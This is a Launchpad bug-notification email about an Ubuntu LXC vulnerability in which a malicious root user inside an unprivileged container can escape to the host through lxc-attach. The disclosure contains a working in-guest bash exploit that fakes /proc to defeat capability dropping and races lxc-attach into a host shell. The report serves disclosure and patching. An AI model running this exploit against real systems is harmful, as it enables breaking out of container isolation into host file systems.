This bug is missing log files that will aid in diagnosing the problem.
>From a terminal window please run:
apport-collect 1639345
and then change the status of the bug to 'Confirmed'.
If, due to the nature of the issue you have encountered, you are unable
to run this command, please add a comment stating that fact and change
the bug status to 'Confirmed'.
This change has been made by an automated script, maintained by the
Ubuntu Kernel Team.
** Changed in: linux (Ubuntu)
Status: New => Incomplete
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1639345
Title:
lxc-attach to malicious container allows access to host
Status in linux package in Ubuntu:
Incomplete
Status in lxc package in Ubuntu:
Fix Released
Status in linux source package in Trusty:
Fix Committed
Status in lxc source package in Trusty:
Fix Released
Status in linux source package in Vivid:
Fix Committed
Status in lxc source package in Vivid:
Fix Released
Status in linux source package in Xenial:
Fix Committed
Status in lxc source package in Xenial:
Fix Released
Status in linux source package in Yakkety:
Fix Committed
Status in lxc source package in Yakkety:
Fix Released
Bug description:
A malicious root user in an unprivileged container may interfere with
lxc-attach to provide manipulated guest proc file system information
to disable dropping of capabilities and may in the end access the host
file system by winning a very easy race against lxc-attach.
In guest sequence:
cat <<EOF > /tmp/test
#!/bin/bash -e
rm -rf /test || true
mkdir -p /test/sys/kernel
echo "proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0" > /test/mounts
echo 0 > /test/sys/kernel/cap_last_cap
mkdir -p /test/self
mknod /test/self/status p
cd /proc
mount -o bind /test /proc
while true; do
pid=\$(ls -al */exe | grep lxc-attach | sed -r -e 's/.* ([0-9]+)\\/exe
->.*/\\1/')
if [ "\${pid}" != "" ]; then
cd /
umount -i -f -l -n /proc
exec /LxcAttachEscape "\${pid}" /bin/bash
fi
sleep 1
done
EOF
See attachment for LxcAttachEscape.c
Exploit uses fixed fd=7 for attacking, on other test environment, it
might be other fd. Tests were performed by attacking lxc-attach
started by
screen lxc-attach -n [guestname]
which is the sequence required against the TTY-stealing attacks also
not fixed in all lxc-attach versions.
In my opinion two bugs might need fixing:
* lxc-attach should not use untrusted/manipulated information for proceeding
* kernel should prevent against ptracing of lxc-attach as it was created in
another USERNS
# lsb_release -r -d
Description: Ubuntu 16.04.1 LTS
Release: 16.04
# apt-cache policy lxc1
lxc1:
Installed: 2.0.5-0ubuntu1~ubuntu16.04.2
Candidate: 2.0.5-0ubuntu1~ubuntu16.04.2
Version table:
*** 2.0.5-0ubuntu1~ubuntu16.04.2 500
500 http://debarchive-ehealth.d03.arc.local/ubuntu
xenial-updates/main amd64 Packages
100 /var/lib/dpkg/status
2.0.0-0ubuntu2 500
500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial/main amd64
Packages
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1639345/+subscriptions
--
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help : https://help.launchpad.net/ListHelp
